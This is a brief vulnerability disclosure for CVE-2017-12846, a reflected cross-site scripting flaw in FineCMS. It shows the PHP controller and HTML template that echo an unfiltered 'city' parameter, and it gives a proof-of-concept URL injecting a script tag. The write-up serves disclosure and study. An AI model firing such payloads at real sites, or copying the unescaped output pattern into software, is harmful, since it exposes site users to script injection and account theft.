The latest version of finecms unlimited XSS

CVE-2017-12846

the problem is in /finecms/dayrui/controllers/member/api.php

Third-party platforms are invoked here, but the filtering is not strictly enforced.The vulnerability function is as follows

public function baidumap() {

        $list = $this->input->get('city') ? explode(',', urldecode($this->input->get('city'))) : NULL;
        $city = isset($list[0]) ? $list[0] : '';
        $value = $this->input->get('value');
        $value = strlen($value) > 10 ? $value : '';

        $this->template->assign(array(
            'city' => $city,
            'value' => $value,
            'list' => $list,
            'name' => $this->input->get('name'),
            'level' => (int)$this->input->get('level'),
            'width' => $this->input->get('width'),
            'height' => $this->input->get('height') - 30,
        ));
        $this->template->display('baidumap.html', 'admin');

    }

Here we can see$valueand$cityParameters do not open XSS filter，although$valueare limited by a length of 10，The result is that even a short domain name cannot construct an effective XSS，But our $city parameters do not filter effectively，And it is directly assign to the template.
Let’s look at the templatebaidumap.html

​<div id="toolbar">
    <div class="selCity">
        <div class="right">
            <a href="javascript:;" class="mark" onClick="addMarker();">{fc_lang('添加标注')}</a>
            <a href="javascript:;" onClick="removeMarker();" class="map">{fc_lang('重置地图')}</a>
        </div>
        <strong id="curCity">{$city}</strong> [<a onClick="mapClose();" id="curCityText" href="javascript:;">{fc_lang('更换城市')}</a>]
    </div>

You can see that our $city variable is injected directly into the < strong > label, so we can construct the payload directly

​http://localhost/index.php?s=member&c=api&m=baidumap&city=<script>alert('1')</script>&value=123

(not just baidumap, the upload and other functions on the back of the page have this situation, the same solution)
​